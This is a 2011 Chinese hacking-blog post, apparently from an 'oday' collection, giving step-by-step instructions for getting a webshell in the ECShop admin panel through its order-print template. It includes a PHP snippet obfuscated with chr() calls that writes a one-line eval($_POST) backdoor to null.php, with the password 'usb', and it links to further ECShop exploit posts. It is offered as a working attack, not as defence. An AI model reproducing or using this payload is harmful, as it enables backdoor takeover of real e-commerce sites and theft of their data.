ecshop后台获取shell最新方法,通杀最新版本&后台低权限

2011, March 19, 9:00 PM. oday收藏
Submitted by admin

后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!
大小: 10.88 K
尺寸: 193 x 340
浏览: 77 次
点击打开新窗口浏览全图

转换后的代码:
大小: 13.79 K
尺寸: 500 x 112
浏览: 145 次
点击打开新窗口浏览全图

2.把转换后的代码写入订单打印模板(源码模式,写的时候注意两边加闭合):
大小: 14.81 K
尺寸: 500 x 170
浏览: 100 次
点击打开新窗口浏览全图

保存:
大小: 17.07 K
尺寸: 430 x 187
浏览: 52 次
点击打开新窗口浏览全图

跳回订单页面,选定一个订单点打印:
大小: 11.63 K
尺寸: 386 x 142
浏览: 49 次
点击打开新窗口浏览全图

提交解析上传成功:
大小: 16.09 K
尺寸: 487 x 118
浏览: 51 次
点击打开新窗口浏览全图

3.连接文件:
http://localhost/null.php
懒人就用下面的代码,连接文件为根目录下null.php,密码为 usb:

<?php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>

图片附件:
大小: 28.73 K
尺寸: 500 x 199
浏览: 59 次
点击打开新窗口浏览全图

Tags: ecshop

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ecshop最新版 (v272) 本地包含拿SHELL (浏览: 18575, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16094, 评论: 0)
ECshop 支付方式注射 0day (浏览: 14386, 评论: 0)
ecshop v2.72 前台写shell漏洞 (浏览: 12203, 评论: 0)
ecshop2.72鸡肋注入 (浏览: 11149, 评论: 0)
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell (浏览: 13014, 评论: 0)
ecshop后台拿shell的又一种方法 (浏览: 13923, 评论: 0)
ecshop SQL注射漏洞0821 0day (浏览: 11164, 评论: 0)
ECSHOP数据库结构参数表结构说明 (浏览: 15219, 评论: 0)
再说两种ecshop后台拿shell的方法 (浏览: 12209, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):